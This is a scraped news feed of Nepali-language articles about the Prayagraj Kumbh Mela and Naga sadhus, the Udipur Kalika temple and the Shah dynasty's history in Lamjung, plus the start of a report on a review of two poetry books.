प्रयागराज तीन नदी गंगा, यमुना र सरस्वतीको त्रिवेणी हो । तर, रोचक त के छ भने त्यहाँ गंगा र यमुना मात्र मिसिएको देखिन्छ । सरस्वती नदी भने तीर्थाटनका पर्यटकहरूले देख्न सक्दैनन् । तर, सरस्वती नदी भित्रभित्रै बग्दै आएर त्रिवेणीमा मिसिन्छ भन्ने विश्वास गर्दछन । किनकि, प्राचीन हिन्दू ग्रन्थमा गंगा र यमुनाकै जस्तो सरस्वती नदीको पनि ठूलो चर्चा, प्रशंसा र महिमाको गान छ । भगवान कृष्णले काशी र द्वारकाबीचको यात्रा सरस्वती नदी हुँदै नौकाबाट गर्दथे भन्ने वर्णन छ । किन देखिएन सरस्वती नदी ! सरस्वती नदी नदेख्नुको कारण बारे धार्मिक विश्वास र भौगर्भिक परिवर्तन दुवै प्रकारका तर्क छन । सरस्वती नदी मारवाड र सौराष्ट्रबाट प्रवाहित हुँदै प्रयागराजमा आएर गंगा र यमुनामा मिसिन्थ्यो भन्ने विश्वास छ । जब सौराष्ट्र क्षेत्रमा पाप, अनाचार, दुराचार फैलियो तब सरस्वती नदी प्रयागराजमा आएर भूमिगत भएको धार्मिक तर्क छ । अर्को तर्कअनुसार राजस्थानको थार मरुभूमि क्षेत्र भौगर्भिक परिवर्तन हुनु अघि हराभरा, वनजगल र कृषियोग्य जमिन थियो । प्राचिनकालमा राजस्थानमा भएको भौगर्भिक परिवर्तनले जमिन भित्रको बलौटो माटो सतहमा आएर मरुभूमि बन्यो । यही प्रक्रियामा सरस्वती नदी भूमिगत भएको हो भन्ने तर्क पनि छ ।
कुम्भमेला बिशेष गरी साधु बाबाहरूको मेला हो । कुम्भ मेलामा नागाबाबाहरूको चर्चा धेरै हुन्छ । पहिलो चोटी प्रयागराज पुग्ने पर्यटक त साधुको बथान देखेर अचम्म मान्दछ । शरीरमा खरानी घसेका साधुहरूको भिडमा कोही निर्वस्त्र कोहीले लगौँटी मात्र लगाएका सर्पको माला लगाएका त्रिशूल र डमरु बोकेर साधुहरूको भिडले कुम्भको मेलामा छुट्टै आकर्षण हुन्छ । बिशेष गरी कुम्भमेलाको शाही स्नानमा नागाबाबा अखडाको अग्राधिकार हुन्छ । कुम्भ स्नानमा रोलक्रम पाएका १३ अखडामध्ये ७ नागाबाबा, ३ वैष्णवी र ३ उदासिन अखडा हुन्छन । नागाबाबाको शाही स्नान पछि मात्र वैष्णव र उदासिन अखडाले स्नान गर्ने पालो आउछ । नागाबाबा शैव, शिवभक्त हुन । वैष्णवी अखडाले विष्णुको आराधना गर्दछन । उदासिन मत भने वेदान्त दर्शन र ज्ञानमा विश्वास गर्ने अखडा हुन । भारत वर्षमा मुसलमानहरूको आगमन र अतिक्रमण बढ्दै जाँदा कुम्भको रक्षा नागाबाबाहरूले गरेका थिए । तसर्थ, त्यो समयमा नागाबाबाहरूले हिन्दू महाराजाबाट यस्तो अग्राधिकार पाएका थिए । नागाबाबाले धार्मिक सेनाका अतिरिक्त राज्यलाई अप्ठ्यारो पर्दा युद्धमा समेत भाग लिन्थे । सन् १८५८ को कुम्भ मेलामा अंग्रेज फौजसँगको लडाइँमा ७४५ जना नागाबाबा मारिएका थिए । तर पनि नागाबाबाहरूले अंग्रेज फौजलाई कुम्भबाट भगाएका थिए ।
भारतमा साधुहरूका सयौं अखडाहरू छन । साधुहरूको सन्यासी, बैरागी र उदाशी जस्ता अखडा हुन्छन । ती अखडामा छुट्टाछुट्टै सम्प्रदायका छुट्टै संस्कार हुन्छ । साधुहरू नाथ, अघोरी, अवधूत, बाबा, अघड, योगी, सिद्ध आदि हुन्छन । शैव सन्तहरूमा नागाबाबाहरू र दसनामी सम्प्रदायका साधुहरूको छुट्टै संकार हुन्छ । शैव सन्यासी अखडा अन्तर्गतको जुना अखडालाई सन्यासीहरूको महत्वपूर्ण अखडाको रुपमा लिने गरिन्छ । शंकराचार्यले मुसलमानको आक्रमणबाट बच्न स्थापना गरेको नागाबाबा हिन्दु संस्कार भित्रको रजोगुणी फौज मानिन्छ । खरानीलाई सौन्दर्य प्रशाधन मान्ने नागाबाबाहरू वास्तवमै नागा हुन्छन । नागाबाबाले देखाउने चर्तिकला पनि तीर्थाटनका पर्यटकहरूका लागि कौतुहलको विषय बन्दछ । नागाबाबा बन्नको लागि कठोर तपस्या गर्नु पर्दछ । नागा उपासना गर्नु भनेको सांसारिक जीवनबाट पूर्णतया अलग रहनु, इन्द्रियलाई नियन्त्रण गर्नु र सबै प्रकारका कामबासनाको अन्त्य गर्नु हो । त्यसपछि तपस्या, ब्रह्मचर्य, शान्तता, ध्यान, त्याग, धार्मिक अनुशासन र निष्ठा आदिलाई प्रमुख रुपमा ६ बर्ष परीक्षण गरिन्छ । नागा उपासनाको १२ बर्ष पुरा भए पछी श्रीदिगम्बर सचिव पद प्राप्त हुन्छ ।
नागाबाबा कुम्भमा १७ श्रृंगारमा सजिएका हुन्छन । नागाहरूले लंगोटी, भवभूत, चन्दन, खुट्टामा फलाम वा चाँदीको चुरा, औंठी, पञ्चकेश, कम्मरमा फूलको माला, निधारमा रोली टाँसी, कुण्डली, हातमा चिमटा बोकेका हुन्छन । नागाको भेष र श्रृगार देख्दा कुम्भमा तीर्थयात्रीहरू छक्क पर्दछन । शरिरमा विभूति घसेका, कपालको जटा, हातमा डमरु वा कमण्डलु, काडा र तिलक, काजलको श्रृगार भएका नागा पाखुरामा रुद्राक्षको मालाले सजिएका हुन्छन । दिगम्बर नागाहरूले लंगौटी लगाउ छन तर श्रीदिगम्बरले कपडा बिना नै जीवन बाँच्नु पर्छ । श्रीदिगम्बर नागको इन्द्रीय नियन्त्रण गरिएको हुन्छ । नागा साधुहरूको धेरै विशेष संस्कारहरूमा तिनीहरूको कामेन्द्रियहरू भंग हुन्छन । पुरुष मात्रै होइन महिलाहरूले पनि यस्तै कठिन १२ बर्ष त्याग र तपस्या गर्नु पर्दछ । तर महिलाहरूले सामान्य एकसरो कपडा लगाउन पाउने अनुमति हुन्छ । प्रयागराजको जुना अखाडाले महिला नागा साध्वीहरूको सबै व्यवस्थापन गर्ने गरेको छ । त्यसैले नागा साध्वी तथा साधुहरू अत्यन्तै पुजनीय हुन्छन । नागा र अघोरी साधुमा पनि फरक छ । नागाबाबा र अघोरीमा भिन्न साधुको रुप हो । यिनीहरूको भेषभुषा देख्नको लागि उस्तै देखिन्छ । तर, उनीहरूको साधु बन्ने प्रक्रिया र रहनसहन तथा तप साधनामा धेरै अन्तर हुन्छ । नागाबाबा कुम्भमा डुबुल्की गरेर मात्र नागाबाबाको भेष धारण गर्छन भने अघोरीहरू कुम्भमा जाँदैनन ।
पर्यटकहरू प्रयागराजमा गंगा र यमुना नदीको पानीको बहाव देख्दा अचम्म हुन्छ । नदीको उदगमस्थल कहाँ होला ? यति ठूलो नदी कहाँ गएर मिसिन्छ होला ? भन्नेमा पर्यटकहरूमा कौतुहल हुन्छ । गंगा नदी भारतको उत्तराखण्ड राज्यबाट उदगम भएर दक्षिण पूर्वतिर बग्दै बंगालको खाडीमा गएर समुद्रमा मिसिन्छ । गंगा र यमुना दुई नदी किनारमा ठूला शहर बजार र धार्मिक सम्पदाहरू पर्दछन । गगा नदीसँग धेरै पौराणिक कथाहरू जोडिएका छन । गंगा नदीको मुख्य सहायक नदी भागीरथी हो । भागीरथी गोमुख नामको गगोत्री हिमतालबाट उदगम हुन्छ । यो हिमतालमा नन्दा देवी, कामत पर्वत र त्रिशुल पर्वतको जलाधार मिसिन्छ । भागीरथी र अलकनन्दा देव प्रयागमा मिसिएपछि नदीको परिवर्तन भै गंगा नदी बन्दछ । त्यसपछि गगा नदी ऋषिकेश हुँदै हरिद्वारमा पुग्दछ । हरिद्वारबाट गढमुक्तेश्वर, सोरोन फरुखाबाद, कन्नौज, बिठूर, कानपुर हुँदै प्रयागराजमा गंगा र यमुना मिसिन्छ । यमुना नदी गंगा नदीको सबैभन्दा ठूलो र लामो सहायक नदी हो । यमनोत्री हिमनदीबाट यमुना नदीको उदगम हुन्छ । यमुना नदीले हरियाणा, दिल्ली र आघरा हँुदै प्रयागराजमा गंगा नदीमा मिसिन्छ । हिन्दु मिथक अनुसार यमुना सुर्य देवकी पुत्री र यमराजका बहिनी भन्ने गरिन्छ । ताज महल यमुना नदीको किनारामा रहेको छ । केदारनाथ र बद्रीनाथ मन्दिर पनि गंगा र यमुना नदी बिच उत्तराखण्डको पहाडमा पर्दछ । पश्चिम नेपालको भेरी, कर्णाली र महाकाली सबै नदीहरू भारतको घागरामा मिसिन्छ र अयोध्यामा सरयु समेत गंगा नदीमा मिल्दछ । अयोध्यादेखि गंगा नदी प्रायागराज हुँदै बनारसमा पुग्दछ । त्यसपछि नारायणी नदी भारतको सोनापुर नजिक हाजीपुरमा र कोशी नदी भारतको विहार राज्यको कर्सेला घाटमा गंगा नदीमा मिसिन्छ ।
कुम्भमेला तीर्थाटन पर्यटकहरूका लागि महान स्नान पर्वको रुपमा लिने गरिन्छ । प्रयागराज बाहेक हरिद्वार, उज्जैन, र नासिकमा पनि प्रत्येक १२ वर्षमा कुम्भमेला लाग्ने गर्दछ । महाकुम्भ मेलाको सांस्कृतिक महत्व गहिरो छ । कुम्भमेलामा लाखौं साधु सन्तहरू, तपस्वीहरू, धार्मिक गुरुहरू र तीर्थाटनका पर्यटकहरू पुग्दछन । नेपाल र भारत बीचको धार्मिक तथा सांस्कृतिक सम्बन्धको कारण महाकुम्भमा नेपालका विभिन्न धार्मिक संघ÷संस्थाहरूबाट पनि महाकुम्भमा अमृत स्नानमा सहभागी भएका छन । हिन्दू धर्ममा धार्मिक यात्राको विशेष महत्व छ । भारतीय पर्यटकहरू पनि नेपालमा पशुपती, लुम्विनी र स्वर्गद्वारी लगायत विभिन्न स्थानमा तीर्थाटनको लागि प्रत्यक बर्ष लाखौंको सख्यामा आउने गर्दछन ।
पर्यटकहरुलाई कुम्भमेलामा नयाँ अनुभव र अनुभूति हुन्छ । कुम्भमेलामा जाँदा पर्यटकहरूले इलाहाबाद किला, स्वराज भवन, आनन्द भवन, इलाहाबाद उच्च न्यायालय, रानीमहल आल सेण्टस कैथैड्रिल पुग्न समेत खोज्दछन । अर्कोतर्फ तीर्थाटनका लागि हनुमान मन्दिर, शंकर विमान मण्डप, हनुमत निकेतन, सरस्वती कूप, समुद्र कूप, मनकामेश्वर मन्दिर, शिवकुटी र भारद्वाज आश्रम जान सके राम्रो हुन्छ । महाकुम्भमा पुग्नका लागि सडकमार्ग, रेल मार्ग र हवाई मार्ग सबै प्रयोग गर्न सकिन्छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=29836 0
शाह वंशको इतिहास र उदिपुरको कालिका https://www.antaranganews.com/?p=26428 https://www.antaranganews.com/?p=26428#respond Tue, 03 Sep 2024 11:02:24 +0000 https://www.antaranganews.com/?p=26428 इतिहास भित्रका नयाँ कुरा जान्नको लागि अध्यन र अवलोकन गर्न पर्दछ । पर्यटनमा हिमाल, ताल र प्रकृतिसंग रमाएको जस्तो इतिहासमा हँुदैन । ऐतिहासिक सम्पदाको ज्ञान हासिल गर्नको लागि स्थलगत अध्यन गर्नु पर्ने हुन्छ । इतिहास भनेको भएको कुरा हो । सत्य असत्यको बिबेचना भएको कुरा लेखेको शास्त्रनै इतिहास हो । सबै ऐतिहासिक सम्पदाको बारेमा इतिहास लेखनमा छुटेको पनि हुन सक्दछ । इतिहास बनेका घटना र कुराहरू पछिल्लो पुस्ताहरूले सुन्दा र पढदा अचम्म हुन्छन । कतिपय कुराहरू उनीहरूका लागि अपत्यारिलो पनि हुन सक्दछ । पछिल्लो समय शाह वंशको इतिहासमा रुचि राख्ने पर्यटकहरू लमजुङमा पुग्न थालेका छन ।
पृथ्वी राजमार्गको पोखरा– काठमाडौ सडकमा पर्ने डुम्रेदेखि लमजुङ र मनाङ जाने सडक सुरु हुन्छ । हुन त आजभोलि मध्य पहाडी लोकमार्गले पनि गोरखा र कास्की अर्थात पोखराबाट पनि लमजुङ प्रवेश गर्न सकिन्छ । तर पनि चलन चल्तीको मार्ग भनेको डुम्रे– बेसीशहरको सडक मार्ग नै हो । डुम्रेबाट ४२ किलोमिटरको यात्रामा लमजुङको सदरमुकाम बेसीशहर पुगिन्छ । लमजुङ र तनहुँ जिल्लाको सिमा पउदीढिकको बजारमा पर्दछ । पाउदीढिकको बजारदेखि सुरु हुन्छ लमजुङ । बिचमा मर्स्याङदी नदी वारीपारी रमणिय ऐतिहासिक डाँडाकाँडा, सडक किनारमा खेतीयोग्य रहर लाग्दो उर्वर भूमि भोटेओडारका बजार क्षेत्र हुदै रामदीको डाँडामा पुगेपछि देखिन्छ लमजुङको उदिपुरको कालिका मन्दिर भएको थुम्को डाँडा । पहिलो पटक लमजुङको यात्रामा रहेको पर्यटक कालिका मन्दिरको थुम्को डाँडा देख्दैमा अचम्म मान्दछ । उदिपुर बजार क्षेत्रमा पुगेपछि धेरै तीर्थाटनका पर्यटकहरू कालिकाको मन्दिरमा पुग्ने गर्दछन । कालिकाको मन्दिर अर्थात थुम्को डाँडाको फेदीसम्म मोटर मार्ग पुगेको छ । मोटरबाट ओर्लेपछि मात्र पाचँ मिनेटमा २२३ खुडकिला सिडी मार्गको यात्राबाट कालिका मन्दिर परिशरमा पुग्न सकिन्छ । खोज अध्ययनमा रुचि भएका पर्यटकहरूका लागि कालिका मन्दिर पुग्नै पर्ने गन्तव्यमा पर्दछ ।
लमजुङको पाँचसय बर्ष पहिलेको इतिहास आधिकारिक रुपमा लेखिएको छैनभन्दा पनि हुन्छ । लेखिएका धेरै इतिहास पनि लोक कथनमा आधारित छन । इतिहास मानिएका धेरै मठ मन्दिर र सम्पदाहरूको पनि शिलालेख भेटिदैन । उदिपुरको कालिका मन्दिर नरहरि शाहको पालामा स्थापना भएको मानिन्छ । तर कालिका मन्दिरको बारेमा कुनै शिलालेख भने भेटिदैन । इतिहास लेखनमा कनकपत्र, ताम्रपत्र, शिलापत्र मुख्य प्रमाण हुन्छ । इतिहास लेखनमा शिलालेखले तथ्यकुरा पहिल्याउन मद्दत गर्दछ । शिलालेख नभेटिए पनि उदिपुरको कालिकाको उत्पत्ती बारे विभिन्न लोककथाहरू भने छन । आदिम कालदेखि समाजमा सुनाउँदै र सुन्दै आएका कतिपय लोक कथा पछि गएर त्यसैलाई इतिहास मान्ने प्रचलन पनि छ । उदिपुर कालिकाको मन्दिर भएको थुम्को अर्थात डाँडा २ हेक्टर अर्थात ३९ रोपनी क्षेत्रफलमा फैलिएको छ । मन्दिरको डाँडामा साल, चिलौने, हर्रो, बर्रो र ओदालका रुखहरू छन । सुरुमा बर्रोको रुखको जरामुनीबाट पुजा गर्न थालिएको कालिका भगवतीलाई पछि वरिपरी ढुङगाको पर्खाल लगाएर बीच बीचमा प्वाल राखी पुजा गर्ने पनि प्रचलन थियो । त्यसपछि ढुङ्गाको छाना र टिनको छानाबाट पनि मन्दिर बन्यो । टिनको छानाको मन्दिर निर्माण गर्दा गुठी संस्थानबाट पनि केही रकम सहयोग भएको थियो ।
कालिकाको मन्दिरमा पुग्ने पर्यटकहरूले मन्दिरको इतिहास खोज्दछन । शाह वंशको इतिहासलाई आधार मान्ने हो भने लमजुङका राजा यशोबह्म शाहको मृत्युपछि उनका जेठा छोरा नरहरि शाह वि.सं १५९८ मा राजा भएका थिए । राजा नरहरि शाहको पालामा लमजुङमा केही सुधार उन्मुख विकासका काम भएको थियो । नरहरि शाहले बेसीशहरको राजकुलो कर्पुटार र भोर्लेटारको राजकुलो त्यसपछि भोटें ओडारको कुलो निर्माण गराएका थिए । नरहरि शाहले उदिपुरको कालिका मन्दिर मात्र होइन त्यहि समयमा चिती रामचोकमा निशान कालिका मन्दिर निर्माण गर्न लगाएका थिए । स्थापना कालमै दुबै मन्दिरको पुजाआजा चलाउन गुठीको व्यवस्था पनि नरहरि शाहले नै गरेका थिए । अर्कोतर्फ नरहरि शाहले कर्पुरेश्वर र ईशानेश्वर मन्दिरको पनि पुनः निर्माण समेत गराएका थिए । नरहरि शाह धार्मीक स्वभावका थिए । नरहरिले गाउँशहरको कोटमा कचरीघर, पूजाकोठा, अखण्डदीप कोठा, दशैंघर आदि पनि निर्माण गराएका थिए । गाउँशहरको कालिकामा मन्दिरमा वडादशैं र चैतेदशैंमा पूजा गर्न राँगा, बोका, भेडाथुमे, सुँगुरको बलि दिनेका लागि गुठीको व्यवस्था पनि नरहरि शाहकै पालामा भएको थियो । कालिकाको मन्दिरमा पर्व पर्वमा वेद, चण्डी, दुर्गाकवच, रुद्री पाठ र पूजा आरती गर्ने व्यवस्था नरहरि शाहले गरेका हुन ।
राजा नरहरि शाहको पालामा अर्थात आजभन्दा ४८३ बर्ष पहिले स्थापना भएको कालिकाको मन्दिर अहिले गुठि सस्थानको स्विकृती लिएर बेसीशहर नगरपालिका– ११ चिती निवासी अध्यात्मिक चिन्तक समाजसेवी प्रेम बाबु बिष्टले निजी लगानीमा भक्तपुरे ईटा प्रयोग गरी कालिकाको मन्दिर, काल भैरव, होमनकुण्ड र पाटी अर्थात पौवा निर्माण भएको छ । मन्दिर परिशरमा बाग्लुङदेखि ढुङ्गा लगेर बिछाइएको छ । पर्यटकहरू मन्दिर परिशरमा पुग्ना साथ सबैको क्यामेरा क्लिक क्लिक हुन थाल्दछ ।
कोही मन्दिरको फोटो लिन्छन भने कोही भिडिओ बनाउन लाग्दछन । कालिका मन्दिर पर्यटनको लागि प्राकृतिक भ्युटावर पनि हो । मन्दिर परिशरबाट नागवेली आकारमा बग्दै आएका मर्स्र्याङदी र दोर्दी खोलाको दोभान त्रिवेणी अवलोकन गर्न सकिन्छ । मध्य मर्स्याङदी पावर हाउसको बाँध र हिमालय हाइड्रो पावरको विद्युतगृह पनि कालिका मन्दिर परिशरबाट देख्न सकिन्छ । पर्यटकहरूले अर्कोतर्फ चिती रामचोकको निशान कालिका मन्दिर र त्रिवेणीमा रहेको त्रिलोक्यश्वर महादेवको मन्दिर समेत कालिका मन्दिरबाट देख्न सकिन्छ । कालिका मन्दिर परिशरबाटनै चिती र रामचोक गाउँका धेरै भूभाग नजिकैबाट नियाल्न सकिन्छ । अकोतर्फ उदिपुर गाउँ, खत्रीचौर र बल्थुमगाउँ समेत नजिकैबाट देखिन्छ । कालिका मन्दिरमा आजभोलि पिक्निङ स्पोट समेत निर्माण भएको छ । कालिका मन्दिरको फेदिमा उदिपुर निवासी शारदाप्रसाद लोहनीले जमिन खरिद गरी आफ्नै लगानीमा सत्तल अर्थात पाटी समेत निर्माण भएको छ ।
उदिपुरको कालिकाको अभिलेख पुरातत्व बिभागमा भेटिदैन । तर राम शाहको पालामा उदिपुर कालिका मन्दिरमा ८० मूरी खेतको खान्गी गुठी राखेको अभिलेख भने छ । गुठी सस्थानको अभिलेख अनुसार गुठीको जमिन मध्य २० मुरी अक्षताको लागि र झाडू कुडारे सातघरले खानु भन्ने छ । गुठी जमिनमा पन्त र मिश्रको बिवाद भए पछि श्री ३ देव शमशेर जंगबहादुर राणाको शासनकाल बि.स. १९६५ मा कालिकाको बिवाद बारे मुद्धा परेको थियो । यो मुद्धा १६ बर्ष पछि श्री ३ चन्द्र शमशेरको पालामा बि.स.१९८१ मा पन्तको पक्षमा फैसला भएको थियो । अहिलेका पुजारी रामचन्द्र पन्त सातौ पुस्ताका पुजारी हुन ।
कालिका मन्दिरको प्रतिमा स्वरुप उदिपुरको मोटर मार्गको छेउमै फुलपाती चढाउने थान पनि छ । यसले के दर्शाउछ भने कालिकाको महत्व परापूर्व कालदेखिनै रहदै आएको मानिन्छ । कालिका मन्दिरमा बि.स.२०५७ सालदेखि उदिपुर कालिका मन्दिर गुठी ब्यवस्थापन समिती चयन भएको छ । व्यवस्थापन समितिमा सुरुमा अध्यक्ष पुरुषोतम जोशी हँुदै हर्कबहादुर बुढाथोकी, बिष्णुप्रसाद अधिकारी र अहिले चौथो कार्य समितिमा अध्यक्ष बलराम श्रेष्ठ हुनुहुन्छ ।
चिती रामचोकको निशान गढी अर्थात कालिका मन्दिरको पनि छुट्टै इतिहास रहेको छ । द्रव्य शाहले १६१६ सालतिर गोरखाको लिगलिगकोटको दौड जितेपछि लिगलिगकोट र माझकोट कब्जा गरी गोरखा राज्य खडा गरी राजा भए । द्रव्य शाहले आफ्नो बाहुबल र गोरखाका भारदारहरुको सहायताबाट गोरखा राज्यको स्थापना गरेका थिए । यसबाट उनका दाजु नरहरि शाहलाई ईष्र्या भयो । उनले भाइ द्रव्य शाहले मेरै सरदारको रुपमा गोरखा विजय गरेकाले गोरखा माथी लमजुङकै अधिकार हुन्छ भनी खिचलो उठाए । द्रव्य शाह भने आफूले ठूलो कठिनाइका साथ स्थापना गरेको गोरखा राज्यलाई लमजुङमा गाभ्ने पक्षमा थिएनन् । यसबाट नरहरि शाह र द्रव्य शाहबीच विवाद बढ्यो र आपसमा ठूलो शत्रुता भयो । यसपछि लमजुङले द्रव्य शाहको हत्या गर्ने र गोरखामाथी आक्रमण गर्ने लगायतका योजनाहरू बनाइ पटक पटक प्रयास गरियो तर सफलता भएन । यसै विवादका कारण गोरखा र लमजुङबीच पछिसम्म पनि शत्रुता थियो । धेरै पटक दाजु भाइको बिचमा झगडा हँुदा आमा बसन्तावतीले चेपे नदीमा आफ्नो दुधको धारा बगाउँदै सीमा कायम गरेको इतिहास छ ।
त्यो बेला गोरखाको लिगलिगकोटदेखि लमजुङको गाउँशहर आउन द्रव्य शाहका सेनाहरू चेपे तरेपछि साइलीटार हुदै प्याराजुङ, भार्ते भएर दोर्दी खोला तरि रामचोक बेसीको बाटो हिडने गर्दथिए । आफ्नो राज्यसंग लडन द्रव्य शाहका सेनालाई टाढा बाटनै देख्न सकियोस भनेर नरहरि शाहले चिती रामचोकमा निशान कालिकागढी निर्माण गर्न लगाएका थिए । चिति ऐतिहासिक ठाउँ हो । चिति शब्द भागवत महापुराण र सप्तचण्डीमा समेत भेटिन्छ । चितिलाई चेतना भएको मानिसहरूको बसोवास गर्ने ठाउँ पनि भन्ने गरिन्छ । लमजुङका राजा रिपुमर्दन शाहले आफ्नो शासनकालमा शासन गर्न सजिलो होस भनी लमजुङलाई २७ मौजामा अर्थात प्रशासनिक क्षेत्रमा विभाजन गरेका थिए । जसमा रजस्थल, राजा बस्ने ठाउँ राजधानी वा गौंडा निर्माण गरेको ठाउँ । सराञ्चोक, राजाका सिपाहीले सरायँ खेल्ने ठाउँ । चौथर, गौंडाकोट भनी राज्यले सैनिक राख्ने ठाउँ । नौथर, बाह्रथर, लमजुङको फौज बस्ने र तालिम गर्ने ठाउँ । भने जस्तै चितिलाई राजाको चिताईदारहरूलाई बसोबास गर्न खटाइएको ठाउँ भन्ने उल्लेख गरिएको छ ।
नेपालमा शक्ति पिठको इतिहास अनुसार सतीदेवीको अग पतन भएको स्थानलाई मान्ने गरिन्छ । धार्मीक शास्त्र अनुसार भगवानको स्त्री स्वरुपलाई शक्ति मानिएको हो । देवी भागवतका अनुसार नेपाल, भारत, पाकिस्तान, बंगलादेश र श्रीलंकामा गरेर कूल १०८ वटा शक्तिपीठहरू रहेका छन । त्यस्तै, देवीगीताका अनुसार कूल ७२ वटा शक्तिपीठहरू रहेका छन । तन्त्र चूडामणिका अनुसार कूल ५२ शक्तिपीठहरू रहेका छन । देवी पूराणले भने ५१ वटा मात्रै शक्तिपीठको बारेमा चर्चा गरेको छ । त्यो ५१ मध्ये नेपालमा २ वटा शक्तिपीठहरू पर्दछन । त्यसबाहेक स्कन्द पूराणले पनि शक्तिपीठहरूको बारेमा उल्लेख गरेको छ ।
स्कन्द पुराणका अनुसार सतिदेवीको अङ्ग पतन भएको ठाउँमा धेरै शक्तिपिठका मन्दिरहरू रहेका छन । उदिपुरको कालिका मन्दिर पनि शक्तिपिठ त होइन तर पनि शक्तिपीठका रुपमा पुजिन्छ । कालिका देवीको तीर्थाटन गर्दा मागेका कुरा पूरा हुने जनविश्वास छ । उदिपुरको कालिका मन्दिर सबै जातजातिहरूले शक्तिपीठका रुपमा पुजाआजा गर्ने गरिन्छ । कालिको मन्दिरमा नियमित पुजाआजा बाहेक विजयादशमीको नवदुर्गा र चैत्र दशैको अष्ठमीको बेला पञ्चवली र अन्य तीर्थाटनका पर्यटकहरूको भिडनै हुने गर्दछ ।
शाह वंशको इतिहास :
लमजुङ शाहवंशीय शासनको उदगम थलो हो । लमजुङमा १६ औं शताब्दीतिर नेपाल बाइसे चौबिसे राज्यमा विभाजित हुँदा बिसं १५५० मा यशोब्रम्ह शाहले राज्य गर्दथे । त्यो भन्दा पहिला वि.सं १५४० मा कास्कीका राजा कुलमण्डलका माइला छोरा कालु शाहलाई लमजुङका खजे दुरा, कुश्माखर घिमिरे, सुकराम क्याउसा, माघे दुरा र लक्ष्मण दुराले लमजुङको पहिलो चौबीसे राज्यको राजा तुर्लुङकोटमा बनाएका थिए । पछि तुर्लुङकोटबाट दरबार पुरानोकोट सारिएको थियो । अहिले पनि पुरानोकोटमा दरवारको भग्नावशेष देख्न सकिन्छ । कालु शाहलाई तत्कालीन घलेराजाका सेनाले हत्या गरिदिएपछि कुलमण्डलका कान्छा छोरा यशोबह्म शाहलाई राजा बनाएका थिए । लमजुङमा यशोब्रम्ह शाहदेखि क्रमशः नरहरि शाह, चूडा शाह, अचिन्द्र शाह, नरेन्द्र शाह, केहरीनारायण शाह, भीम शाह, रिपुमर्दन शाह र बीरमर्दन शाह समेत गरी वि.सं.१५५० देखि १८३९ सम्म ३०० वर्षसम्म शाह वंशले राज्य गरेको इतिहास छ । त्यो ससमयमा लमजुङ स्वतन्त्र राज्यको रुपमा थियो । लमजुङका अन्तिम राजा बीरमर्दन शाह थिए । शाहवंशीय शासन कालको इतिहासलाई हेर्दा लडाकु र साहसी राज्यको रुपमा लमजुङलाई लिइएको पाइन्छ ।
लमजुङ दरबार नेपालकै पुरानो दरबार हो । बाइसे चौबीसे राज्य अस्तित्वमा रहेका बेला गोरखा दरबार, पाल्पा दरबार, नुवाकोट दरबार, भक्तपुर दरबार जस्तै लमजुङ दरबार बनेको थियो । लमजुङ दरबारमा अहिले शाह वंशको इतिहास खोज अनुसन्धान गर्न पर्यटकहरू पुग्ने गर्दछन् । राजा यशोब्रम्ह शाहका नरहरि शाह र द्रव्य शाह २ छोरा थिए । छोराहरू झगडामा उत्रिएपछि कान्छो छोरा द्रब्य शाहलाई केही अधिकार दिएर यशोबह्म शाहले राइनासकोटको गोठमा पठाए । द्रब्य शाह लमजुङ दरबारमै हुर्किएका हुन । पछि उनले १६१६ सालतिर गोरखाको लिगलिगकोटको दौड जितेपछि लिगलिगकोट र माझकोट कब्जा गरी गोरखा राज्य खडा गरे र त्यही राजा भएर बसे । द्रब्य शाहको ११ औं पुस्ता पृथ्वीनारायण शाह हुन् ।
यशोब्रम्ह शाहले गाउँहशहरमा कालिकामन्दिर, गोरखनाथ गुफा, दरबार, किल्ला, चौतारी, सिंढी र धर्मपानी निर्माण गर्न लगायको इतिहास छ । यशोब्रम्ह शाहले गाउँशहरमा गर्मीको राजधानी र बेसीशहर जाडोको राजधानी बनाएका हुन । वि.सं.१५९८ मा उनले लमजुङमा तोप ढाल्न लगाई सैनिकलाई मजबुती गराएका थिए । कालु शाहका छोरा नरपति शाहलाई राजा यशोब्रम्हले लमजुङको उत्तरतिरका चार गाउँको अक्तियारी दिएका थिए । पछि नरहरि शाह विरुद्ध लागेकाले नरपति मारिएका थिए । पृथ्वीनारायण शाहले बाइसे चौबीसे राज्यलाई एकपछि अर्को गरी गाभेर राज्य विस्तार गर्दा पनि लमजुङ भने स्वतन्त्र रहेको थियो । गोरखा र लमजुङको तार्कुघाटमा लडाइँ हुँदा लमजुङ हारेपछि वि.सं १८३९ मा राजेन्द्र लक्ष्मी शाहको पालामा लमजुङ नेपाल राज्यमा गाभिएको हो ।
(लेखक : स्वतन्त्र पत्रकार संघ नेपालको निवर्तमान राष्ट्रिय अध्यक्ष हुनुहुन्छ । सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=26428 0
कवि वनवासीका दुई कृति ‘ज्ञानक्रान्ति’ र ‘भक्तिसागर’को समिक्षा https://www.antaranganews.com/?p=23730 https://www.antaranganews.com/?p=23730#respond Thu, 18 Apr 2024 14:04:02 +0000 https://www.antaranganews.com/?p=23730 बेसीशहर– कवि रामचन्द्र न्यौपाने ‘वनवासी’का दुई कृतिको एक कार्यक्रमका बीच समिक्षा गरिएको छ । मर्स्याङदी बहुमुखी क्याम्पसका सहप्राध्यापक शालिग्राम अधिकारीको प्रमुख आतिथ्यता तथा ठाडोभाका लोककला प्रतिष्ठान नेपालको आयोजनामा ती कृतिको समिक्षा बैशाख ६ गते गरिएको हो ।
कृतिका बारेमा आफ्नो धारणा राख्दै प्रमुख अतिथि अधिकारीले ज्ञानक्रान्ति प्रयोगधर्मी महाकाव्य हो भन्नुभयो । यो काव्यका दृष्टिले कमजोर भएपनि भगवद् ज्ञानको सत्य तथ्य रुप भएको हुँदा महाकाव्य ग्रहण गर्न सफल छ । यो कृति ज्ञान र भावको दृष्टिकोणले महत्वपूर्ण छ भन्नुभयो । उहाँले यो काव्यमा अलंकार र उपमा प्रयोग गर्छु भनेर नभई स्वतः प्रयोगमा आएको पाइन्छ, यसमा भावना व्यक्त छ, कथावस्तु र कथा वस्तुको सुक्ष्म प्रयोग भए पनि उद्देश्य गहन छ भन्नुभयो । कवित्व साधनाको उत्कृष्ट रुप हो महाकाव्य, यस्ता रचनाले प्रेरणा दिन्छ भन्नुभयो ।
